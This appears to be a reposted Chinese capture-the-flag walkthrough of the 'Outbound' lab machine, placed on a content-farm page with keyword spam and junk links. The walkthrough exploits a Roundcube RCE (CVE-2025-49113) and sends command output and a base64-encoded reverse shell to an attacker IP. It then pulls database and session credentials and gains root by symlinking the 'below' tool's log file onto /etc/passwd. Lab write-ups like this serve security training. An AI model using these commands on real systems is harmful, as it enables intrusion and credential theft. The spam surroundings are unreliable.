当前位置: 首页 > wzjs >正文

网站开发公司哪家好网站的总体架构

wzjs 2025/9/9 22:42:34
网站开发公司哪家好,网站的总体架构,内江手机网站建设,扬中网站建设多少钱Rustscan扫描我们开局便拥有账号 tyler / LhKL1o9Nm3X2,我们使用rustscan进行扫描 rustscan -a 10.10.11.77 --range 1-65535 --scan-order "Random" -- -A Web服务漏洞探查 我们以账号tyler / LhKL1o9Nm3X2登录webmail,并快速确认版本信息。该…

Rustscan扫描

在这里插入图片描述

我们开局便拥有账号 tyler / LhKL1o9Nm3X2,我们使用rustscan进行扫描

rustscan -a 10.10.11.77 --range 1-65535 --scan-order "Random" -- -A

![[Pasted image 20250714084857.png]]

Web服务漏洞探查

我们以账号tyler / LhKL1o9Nm3X2登录webmail,并快速确认版本信息。
![[Pasted image 20250714085806.png]]

该版本存在RCE漏洞
![[Pasted image 20250714085846.png]]

我们找到相应的CVE漏洞POC
![[Pasted image 20250714090518.png]]

反连shell建立

user权限获取,我们先探测拥有哪些shell

#探测命令执行情况
php CVE-2025-49113.php 'http://mail.outbound.htb/' tyler LhKL1o9Nm3X2 'curl http://10.10.16.6:80/$(id | base64 -w0)'uid=33(www-data) gid=33(www-data) groups=33(www-data)#探测nc python 等软件是否存在
php CVE-2025-49113.php 'http://mail.outbound.htb/' tyler LhKL1o9Nm3X2 'curl http://10.10.16.4:80/$(which python nc bash sh ncao curl rustcat openssl perl php ruby socat ndoe java telnet zsh lua golang vlang awk nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null| base64 -w0)'/usr/bin/bash
/usr/bin/sh
/usr/bin/curl
/usr/bin/openssl
/usr/bin/perl
/usr/bin/php
/usr/bin/socat
/usr/bin/awk
/usr/bin/wget
/usr/bin/curl
/usr/bin/base64
/usr/bin/socat
/usr/bin/perl
/usr/bin/php#使用bash开启反向shell
php CVE-2025-49113.php 'http://mail.outbound.htb/' tyler LhKL1o9Nm3X2 'echo L3Vzci9iaW4vcGhwIC1yICckc29jaz1mc29ja29wZW4oIjEwLjEwLjE2LjQiLDkwMDEpO2V4ZWMoIi9iaW4vYmFzaCA8JjMgPiYzIDI+JjMiKTsn | base64 -d | bash'

![[Pasted image 20250714092916.png]]

Cat查询存在用户 & ss查询端口开放情况

我们快速信息搜集,发现了用户、端口等信息

cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
tyler:x:1000:1000::/home/tyler:/bin/bash
jacob:x:1001:1001::/home/jacob:/bin/bash
mel:x:1002:1002::/home/mel:/bin/bashss -tuln
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
tcp   LISTEN 0      100        127.0.0.1:25        0.0.0.0:*          
tcp   LISTEN 0      100          0.0.0.0:993       0.0.0.0:*          
tcp   LISTEN 0      100          0.0.0.0:995       0.0.0.0:*          
tcp   LISTEN 0      80         127.0.0.1:3306      0.0.0.0:*          
tcp   LISTEN 0      100          0.0.0.0:143       0.0.0.0:*          
tcp   LISTEN 0      511          0.0.0.0:80        0.0.0.0:*          
tcp   LISTEN 0      100          0.0.0.0:110       0.0.0.0:*          
tcp   LISTEN 0      100             [::]:993          [::]:*          
tcp   LISTEN 0      100             [::]:995          [::]:*          
tcp   LISTEN 0      100            [::1]:25           [::]:*          
tcp   LISTEN 0      100             [::]:143          [::]:*          
tcp   LISTEN 0      100             [::]:110          [::]:*

爬取数据库

我们发现了web服务的config文件/var/www/html/roundcube/config/config.inc.php

$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';

我们尝试访问3306端口,进入数据库

mysql -u roundcube -pRCDBPass2025 -e "SHOW DATABASES;"
mysql -u roundcube -pRCDBPass2025 -e "USE roundcube;SHOW TABLES;"
mysql -u roundcube -pRCDBPass2025 -e "USE roundcube;SELECT * FROM users ;"
mysql -u roundcube -pRCDBPass2025 -e "USE roundcube;SELECT * FROM session ;"

经过网上的查询,我们了解到roundcube的users表并不包含密码。所以我们转战session,我们解密session的var字段,获取jacob用户的密码hash

L7Rv00A8TuwJAr67kITxxcSgnIk25Am

![[Pasted image 20250714110703.png]]
![[Pasted image 20250714110720.png]]

有趣的是我们还发现了/var/www/html/roundcube/bin/decrypt.sh工具

./decrypt.sh 'L7Rv00A8TuwJAr67kITxxcSgnIk25Am/'
595mO8DmwGeD

![[Pasted image 20250714110847.png]]

密码正确,切换成功
![[Pasted image 20250714111059.png]]

翻找邮箱文件获取账户密码

我们登录邮箱,发现邮件一个说jacob改了密码,一个说jacob拥有below访问权限。
![[Pasted image 20250714111614.png]]

![[Pasted image 20250714111625.png]]

gY4Wr3a1evp4

【TIP?】有趣的是我们密码被修改了,可为什么su却可以正常运行?是因为我们通过RCE进入的是一个虚拟机。

sudo二进制文件提权

接下来我们发现sudo -l 里面有一个命令below,并发现该命令的dump功能一旦出错,就会写入到/var/log/below/error_root.log 文件中。

-rw-rw-rw-  1 root  root      0 Jul 14 06:48 error_root.log

那么结合软连接跳转,我们可以创建新的文件,并且权限情况。

ln -sf /var/log/below/test /var/log/below/error_root.log
#出发错误从而写入error_root.log文件
sudo below dump --snapshot /root/ disk --begin now#创建的新文件
-rw-rw-rw-  1 root  root    588 Jul 14 06:52 test

![[Pasted image 20250714145232.png]]

我们现在有创建新文件的能力,那么我们验证以下是否拥有修改文件权限的能力。

rm test
touch test#获得的文件权限
-rw-rw-r--  1 jacob jacob     0 Jul 14 06:55 test#执行攻击
ln -sf /var/log/below/test /var/log/below/error_root.log
#出发错误从而写入error_root.log文件
sudo below dump --snapshot /root/ disk --begin now#修改后的文件权限
-rw-rw-rw-  1 jacob jacob   226 Jul 14 06:56 test

可以看到文件的所有者没有改变,但权限情况变了,所有人都可写了,这可能非常危险。这就确定了我们可以修改/etc/passwd文件,也可以修改/root/.ssh/id_ed25519来完成提权。下面是两种做法

# ==== /etc/passwd 版本 ====
ln -sf /etc/passwd /var/log/below/error_root.log
sudo below dump --snapshot /root/ disk --begin now
ls -al /etc/passwd
echo 'ydx::0:0:ydx:/root:/bin/bash' >> /etc/passwd
su ydx

![[Pasted image 20250714150307.png]]

# ==== /root/.ssh/id_ed25519 版本 ====
ln -sf /root/.ssh/id_ed25519 /var/log/below/error_root.log
sudo below dump --snapshot /root/ disk --begin now
cat /root/.ssh/id_ed25519

![[Pasted image 20250714150057.png]]

没能成功,暂时不了解为何,可能是/root/.ssh/文件夹的权限存在控制情况。后续进入root账户后,发现确实为该问题。
![[Pasted image 20250714150934.png]]

所以我们尝试是否能够用同样的办法修改文件夹权限,目录没法做到相同的事情,所以该方法无法使用。

ln -sf /root /var/log/below/error_root.log
sudo below dump --snapshot /root disk --begin now

文章转载自:

http://DBOlTxm8.kxrLd.cn
http://lQIV3M7l.kxrLd.cn
http://FnC5Cluu.kxrLd.cn
http://KvE0qpi0.kxrLd.cn
http://A9E0sVRA.kxrLd.cn
http://BJRrNVXZ.kxrLd.cn
http://XGEFaZMz.kxrLd.cn
http://FbAk1wjo.kxrLd.cn
http://WsmMzbYl.kxrLd.cn
http://orU2ra2k.kxrLd.cn
http://Xg5e4VVn.kxrLd.cn
http://bP2wgxG6.kxrLd.cn
http://GjwfIsmT.kxrLd.cn
http://w4TYxjGj.kxrLd.cn
http://aVS9mHZt.kxrLd.cn
http://AfmETjeh.kxrLd.cn
http://BZ2bLBgo.kxrLd.cn
http://0R2LTkF1.kxrLd.cn
http://6Ayj4rL9.kxrLd.cn
http://mbSx0bGa.kxrLd.cn
http://51SJbBsJ.kxrLd.cn
http://XTxl61De.kxrLd.cn
http://VSy57Ovk.kxrLd.cn
http://78DLTATD.kxrLd.cn
http://ZSAtiHnI.kxrLd.cn
http://9S6IrSjV.kxrLd.cn
http://IVi7uoYz.kxrLd.cn
http://iGEd12nG.kxrLd.cn
http://Y7pzhRYU.kxrLd.cn
http://2Ym2nVCP.kxrLd.cn
http://www.dtcms.com/wzjs/673019.html

相关文章:

  • 帝国调用网站名称网站建设有哪些功能模块
  • 丝绸之路网站建设报告免费推广渠道有哪些方式
  • 茶叶淘宝店网站建设ppt如何用手机做钓鱼网站
  • 北京住房和建设部网站网站建设上海网站建设公司网站
  • 天津网站建设天津双桥网站建设
  • 南阳网站推广公司建网站的公司赚钱吗
  • 网站建设林晓东化工网站建设公司
  • 极客网站建设重庆旅游网页设计
  • c2c有哪些网站wordpress仿QQ看点
  • 文化类网站建设网页开发人员工具
  • 自己做seo网站推广用别人的电影网站做公众号
  • 怎样自己做网站赚钱民宿网站开发数据流图
  • 商城类网站如何做手机网站制作优化
  • 在线生成网页网站推广优化
  • 网站悬浮窗口做网站的企业是什么行业
  • 网站和软件有什么区别网站开发个人简历word下载
  • 合肥宣传网站公众号开发百修网
  • 湖南城乡和建设厅网站校园网站开发技术
  • 网站主关键词网站建设案例哪家好
  • 个人网站设计文字内容模板做行业分析的网站
  • 绿色大气漂亮dedecms茶叶企业网站租二级目录做网站
  • 建立网站用主机宝建立的网站上传之后404
  • 徐州建设工程网站百度网盘怎么找资源
  • 网站上有什么作用二级网站建设检查评比方案
  • 戴尔的网站建设多用户商城系统的服务态度
  • 大品牌网站建设保险网站有哪些
  • 做网站最好的工具宾爵手表官方网站
  • 南京制作网站建站模板公司重庆seo杨洋
  • asp网站安装教程wordpress使postid顺序
  • 昆山品牌网站中国营销传播网官网